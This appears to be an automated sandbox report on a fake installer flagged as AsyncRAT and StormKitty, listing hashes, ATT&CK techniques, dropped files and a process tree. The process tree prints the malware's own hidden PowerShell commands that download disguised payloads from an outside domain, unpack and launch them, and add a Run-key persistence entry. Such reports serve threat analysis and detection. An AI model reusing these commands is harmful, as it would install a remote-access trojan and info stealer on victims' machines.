asyncrat | 7fa3c53115c61a095da7ce93276e828198fba45f93c30bf245a0ffd9266a77bf

Analysis

max time kernel
140s
max time network
164s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
04-11-2024 13:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Installer_x64_Final_Release.exe
Size

349KB
MD5

c7e6efa0d590d5549cbcc04c002e7d52
SHA1

928ae92ad78feb1a6619002a426fd29259ebbb10
SHA256

4fedd10d64e0b83fe1c8a6cc64116143340606ac1b4222fb3c2cd1ec69aa75f3
SHA512

ad2e2101370ba3878ebf35f598119e16325a8929685e59ddf9b920fb9ac77e7dfc1abbe323673a9d494f6eb3ed37867e615af4305ceee151d4a932cbe971b16b
SSDEEP

3072:sn/GaFJJZ+Qima9IjVe9+L+xZ2N4OCSPQwZkXkAy5vHSQhQWXUjzBW2HwbvWUFIY:IBmm+aVecLuK0uPZQkkQq9Wew7a6n

Score

10^/10

asyncrat stormkitty discovery execution persistence rat stealer

Malware Config

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

resource	yara_rule
behavioral2/memory/3448-138-0x0000000000400000-0x000000000064A000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty

Blocklisted process makes network request 2 IoCs

flow	pid	Process
28	776	powershell.exe
71	4472	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
776	powershell.exe
1128	powershell.exe
8	powershell.exe
2964	powershell.exe
4472	powershell.exe
776	powershell.exe
4472	powershell.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	Installer_x64_Final_Release.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Martin = "cmd.exe /C start \"\" /D \"C:\\Users\\Public\\Downloads\\Martin\" \"C:\\Users\\Public\\Downloads\\Martin\\Martin.exe\""	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1464 set thread context of 3448	1464	Martin.exe	119

Executes dropped EXE 1 IoCs

pid	Process
1464	Martin.exe

Loads dropped DLL 2 IoCs

pid	Process
1464	Martin.exe
1464	Martin.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2752	3448	WerFault.exe	119

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
776	powershell.exe
776	powershell.exe
1128	powershell.exe
1128	powershell.exe
8	powershell.exe
8	powershell.exe
2964	powershell.exe
2964	powershell.exe
4472	powershell.exe
4472	powershell.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

description	pid	Process
Token: SeDebugPrivilege	776	powershell.exe
Token: SeDebugPrivilege	1128	powershell.exe
Token: SeDebugPrivilege	8	powershell.exe
Token: SeDebugPrivilege	2964	powershell.exe
Token: SeDebugPrivilege	1464	Martin.exe
Token: SeDebugPrivilege	4472	powershell.exe
Token: SeDebugPrivilege	3448	AddInProcess32.exe
Token: SeIncreaseQuotaPrivilege	3448	AddInProcess32.exe
Token: SeSecurityPrivilege	3448	AddInProcess32.exe
Token: SeTakeOwnershipPrivilege	3448	AddInProcess32.exe
Token: SeLoadDriverPrivilege	3448	AddInProcess32.exe
Token: SeSystemProfilePrivilege	3448	AddInProcess32.exe
Token: SeSystemtimePrivilege	3448	AddInProcess32.exe
Token: SeProfSingleProcessPrivilege	3448	AddInProcess32.exe
Token: SeIncBasePriorityPrivilege	3448	AddInProcess32.exe
Token: SeCreatePagefilePrivilege	3448	AddInProcess32.exe
Token: SeBackupPrivilege	3448	AddInProcess32.exe
Token: SeRestorePrivilege	3448	AddInProcess32.exe
Token: SeShutdownPrivilege	3448	AddInProcess32.exe
Token: SeDebugPrivilege	3448	AddInProcess32.exe
Token: SeSystemEnvironmentPrivilege	3448	AddInProcess32.exe
Token: SeRemoteShutdownPrivilege	3448	AddInProcess32.exe
Token: SeUndockPrivilege	3448	AddInProcess32.exe
Token: SeManageVolumePrivilege	3448	AddInProcess32.exe
Token: 33	3448	AddInProcess32.exe
Token: 34	3448	AddInProcess32.exe
Token: 35	3448	AddInProcess32.exe
Token: 36	3448	AddInProcess32.exe
Token: SeIncreaseQuotaPrivilege	3448	AddInProcess32.exe
Token: SeSecurityPrivilege	3448	AddInProcess32.exe
Token: SeTakeOwnershipPrivilege	3448	AddInProcess32.exe
Token: SeLoadDriverPrivilege	3448	AddInProcess32.exe
Token: SeSystemProfilePrivilege	3448	AddInProcess32.exe
Token: SeSystemtimePrivilege	3448	AddInProcess32.exe
Token: SeProfSingleProcessPrivilege	3448	AddInProcess32.exe
Token: SeIncBasePriorityPrivilege	3448	AddInProcess32.exe
Token: SeCreatePagefilePrivilege	3448	AddInProcess32.exe
Token: SeBackupPrivilege	3448	AddInProcess32.exe
Token: SeRestorePrivilege	3448	AddInProcess32.exe
Token: SeShutdownPrivilege	3448	AddInProcess32.exe
Token: SeDebugPrivilege	3448	AddInProcess32.exe
Token: SeSystemEnvironmentPrivilege	3448	AddInProcess32.exe
Token: SeRemoteShutdownPrivilege	3448	AddInProcess32.exe
Token: SeUndockPrivilege	3448	AddInProcess32.exe
Token: SeManageVolumePrivilege	3448	AddInProcess32.exe
Token: 33	3448	AddInProcess32.exe
Token: 34	3448	AddInProcess32.exe
Token: 35	3448	AddInProcess32.exe
Token: 36	3448	AddInProcess32.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2040 wrote to memory of 3308	2040	Installer_x64_Final_Release.exe	85
PID 2040 wrote to memory of 3308	2040	Installer_x64_Final_Release.exe	85
PID 3308 wrote to memory of 1664	3308	Installer_x64_Final_Release.exe	88
PID 3308 wrote to memory of 1664	3308	Installer_x64_Final_Release.exe	88
PID 1664 wrote to memory of 4844	1664	cmd.exe	90
PID 1664 wrote to memory of 4844	1664	cmd.exe	90
PID 1664 wrote to memory of 776	1664	cmd.exe	91
PID 1664 wrote to memory of 776	1664	cmd.exe	91
PID 1664 wrote to memory of 1128	1664	cmd.exe	112
PID 1664 wrote to memory of 1128	1664	cmd.exe	112
PID 1664 wrote to memory of 8	1664	cmd.exe	116
PID 1664 wrote to memory of 8	1664	cmd.exe	116
PID 8 wrote to memory of 1464	8	powershell.exe	117
PID 8 wrote to memory of 1464	8	powershell.exe	117
PID 1664 wrote to memory of 2964	1664	cmd.exe	118
PID 1664 wrote to memory of 2964	1664	cmd.exe	118
PID 1464 wrote to memory of 3448	1464	Martin.exe	119
PID 1464 wrote to memory of 3448	1464	Martin.exe	119
PID 1464 wrote to memory of 3448	1464	Martin.exe	119
PID 1464 wrote to memory of 3448	1464	Martin.exe	119
PID 1464 wrote to memory of 3448	1464	Martin.exe	119
PID 1464 wrote to memory of 3448	1464	Martin.exe	119
PID 1464 wrote to memory of 3448	1464	Martin.exe	119
PID 1464 wrote to memory of 3448	1464	Martin.exe	119
PID 3308 wrote to memory of 4060	3308	Installer_x64_Final_Release.exe	122
PID 3308 wrote to memory of 4060	3308	Installer_x64_Final_Release.exe	122
PID 4060 wrote to memory of 4472	4060	cmd.exe	125
PID 4060 wrote to memory of 4472	4060	cmd.exe	125

C:\Users\Admin\AppData\Local\Temp\Installer_x64_Final_Release.exe
"C:\Users\Admin\AppData\Local\Temp\Installer_x64_Final_Release.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2040
- C:\Users\Admin\AppData\Local\Temp\app-11.17.0\Installer_x64_Final_Release.exe
  "C:\Users\Admin\AppData\Local\Temp\app-11.17.0\Installer_x64_Final_Release.exe"
  2⤵
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:3308
- - C:\Windows\SYSTEM32\cmd.exe
    cmd /c sora.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1664
  - - C:\Windows\system32\curl.exe
      curl -X GET https://cyberniton.com/star/process.php
      4⤵
      PID:4844
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://cyberniton.com/Storage/Martin.jpg' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Martin.zip'"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:776
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle Hidden -Command "Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\Martin.zip' -DestinationPath 'C:\Users\Public\Downloads\Martin' -Force"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1128
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle Hidden -Command "Set-Location -Path 'C:\Users\Public\Downloads\Martin'; Start-Process 'Martin.exe'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:8
    - - C:\Users\Public\Downloads\Martin\Martin.exe
        
        "C:\Users\Public\Downloads\Martin\Martin.exe"
        5⤵
        Suspicious use of SetThreadContext
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1464
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3448
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 1276
        7⤵
        Program crash
        
        PID:2752
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle Hidden -Command "Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'Martin' -Value 'cmd.exe /C start \"\" /D \"C:\Users\Public\Downloads\Martin\" \"C:\Users\Public\Downloads\Martin\Martin.exe\"'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2964
- - C:\Windows\SYSTEM32\cmd.exe
    cmd /c sorast.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4060
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://cyberniton.com/Storage/Martinst.jpg' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Martinst.zip'"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3448 -ip 3448
1⤵
PID:1232

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e7f32a641b4f4b3ed6b07424877c39be

SHA1
8be7a46fb4561b1562ce0e0ee1c395c3cf8596cc

SHA256
bb6cc15f2b9874e32b6978ca8a740b6da91f050fef7bf59c656baa337a924465

SHA512
59f656a89c70850af235139e6584e87dfdbe9f7137b5f73d4d0bf535ca57f5688c26b4c611728986e0bbb524a85a29e1ba9852e810f9d1b2388261c02bf81557

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d9a977cbd32de1f11da226d5e864820b

SHA1
121a2091be6bb5434bac79948a3bc8ff84509af3

SHA256
65bdec5cbd34c632ddc6eb862c357f7b6f34b2da086c17d888767a8ca05cc64d

SHA512
b119ab8d0c8fb0089544be449e124e6d76da5460ff638cd33a9e5c86bc2bc596e98086da5d5f33db76b6d473d513eb8ef6d9e22d0a2397293c12c9e2e977f7a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
612b19feac3b60bdc771ec888769ea75

SHA1
cc0117dc3f83e139f22d7c9f068a0fa2027fc8fb

SHA256
3eb12f5e02a7aad8764186e1f62d9cebcc8667c854ebf4356fe404f042b84ec1

SHA512
2f56333015641eb11b853a350ca5a01763ab9fd2d572fca51ba2d7df3018546c9667a64ba670e443e0fef5c10879964bfe18084ae0b44e95cb17dcc864ffd4af

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sora.bat

Filesize
7KB

MD5
584db35e5bedc244c7fa8e96d72c4b4b

SHA1
e76629464cef09ce5ef474ff06731a5826b07cd6

SHA256
b65d65a027f3d6aad56c1d864347e2110fb4d42ebaf97b96ac6a689ba47891c3

SHA512
2eaa219af41107a2658823a9e5de5d1d19aa447f9eb3c1432bd12cec21647908bbe803d706097090ed192abea8b722bc548682877709623584ded5ccb4891075

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sorast.bat

Filesize
7KB

MD5
0e3af1059504f34398373a7e5995cf5e

SHA1
748bb1a44b1c0754c0ee930ddcda67a1d4025d8d

SHA256
294cd777aed1e5bc55b7c2f29f6e38d1998f90da379904e1fdb9138c60a14144

SHA512
23cd71d9c8c0c8da56645b7e93215410224f3ea9c6fcecca5c8038a30813d65790ab4c44e22e55c0deac01c3c2c34d00a257d06688328d3167d3bfb0cc2d1c02

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fyvyvkde.ghc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\Downloads\Martin\Martin.exe

Filesize
36KB

MD5
7f9be298e37baa0f13817a3e5ca399f8

SHA1
abf940d4dbc295f535df4140fe20f6fa509d7fcc

SHA256
0ec190f69979f59fb5d33f6f1231d5be05f02d1de05763cce4e474f7363aff95

SHA512
64c38caa11e3c14337c72aaf668a25e991c205778bf404c618a2e446cc4c066083e2fbc8146ad90a188b6102353d0dbe581b60ea38fad98a75914ba3857c5b75

Download Submit
C:\Users\Public\Downloads\Martin\Qt5Core.dll

Filesize
4.8MB

MD5
c72524bcfd9b29c7c71f5af40a88d0bc

SHA1
2105d84397f6301c3641bbdf64d226e933caf4a9

SHA256
4828929b35af903a6d8429b34eefb418dc77a035eaa36a7308fb8ca404ac600f

SHA512
6d1b81b53bb1e4b21df01c5cf3c38c9597118aa181160939b33569e569e39f03a7b5ee8126f9a65df7d2101c97597fb1a4a03269585d8b187e41c06343471cb3

Download Submit
C:\Users\Public\Downloads\Martin\concrt140e.dll

Filesize
2.3MB

MD5
96d4cb7c2e7193792bfd6b44240057d4

SHA1
95192a66380d9f7d3f9cafcbaebd6dfc0adaa5b6

SHA256
9ab56ce3cb9363dbf0490116c762b0d639935763ce3f94f24fedbf3462c88184

SHA512
e341c6b28ab5cc56c2e00ea5403863ed01426727f14bb6d7327ad815d3c4f177c4495606852b8817c5dc75e608be5f9b4225602ae74721525ded3f4e943ea213

Download Submit
C:\Users\Public\Downloads\Martin\vcruntime140.dll

Filesize
84KB

MD5
3e746699828f9e9aab45b8f1c3cea4a1

SHA1
5ba84f26e47670c865e21e3303a28e54608475d3

SHA256
de6ca787d0e0a30810fea570db867199d32ed71867e1c36a0f58ed71d540f035

SHA512
ecc2c06a96661f063bbce91c5a7239e24aae3a5924ebb8773cef3d9e1d332959612bd052991ace98700d25912266ee39ee93ab623befd20f548d62f451426218

Download Submit
memory/776-18-0x00007FFABEC83000-0x00007FFABEC85000-memory.dmp

Filesize
8KB

Download
memory/776-6-0x000001F0947A0000-0x000001F0947C2000-memory.dmp

Filesize
136KB

Download
memory/776-24-0x00007FFABEC80000-0x00007FFABF741000-memory.dmp

Filesize
10.8MB

Download
memory/776-20-0x00007FFABEC80000-0x00007FFABF741000-memory.dmp

Filesize
10.8MB

Download
memory/776-19-0x00007FFABEC80000-0x00007FFABF741000-memory.dmp

Filesize
10.8MB

Download
memory/776-17-0x00007FFABEC80000-0x00007FFABF741000-memory.dmp

Filesize
10.8MB

Download
memory/776-5-0x00007FFABEC83000-0x00007FFABEC85000-memory.dmp

Filesize
8KB

Download
memory/776-16-0x00007FFABEC80000-0x00007FFABF741000-memory.dmp

Filesize
10.8MB

Download
memory/1128-36-0x00000161537A0000-0x00000161537B2000-memory.dmp

Filesize
72KB

Download
memory/1128-37-0x0000016153780000-0x000001615378A000-memory.dmp

Filesize
40KB

Download
memory/1464-126-0x00007FFADDDD0000-0x00007FFADDFC5000-memory.dmp

Filesize
2.0MB

Download
memory/1464-136-0x00007FFADBF90000-0x00007FFADC04E000-memory.dmp

Filesize
760KB

Download
memory/3448-140-0x0000000005740000-0x0000000005CE4000-memory.dmp

Filesize
5.6MB

Download
memory/3448-138-0x0000000000400000-0x000000000064A000-memory.dmp

Filesize
2.3MB

Download
memory/3448-153-0x0000000005200000-0x0000000005266000-memory.dmp

Filesize
408KB

Download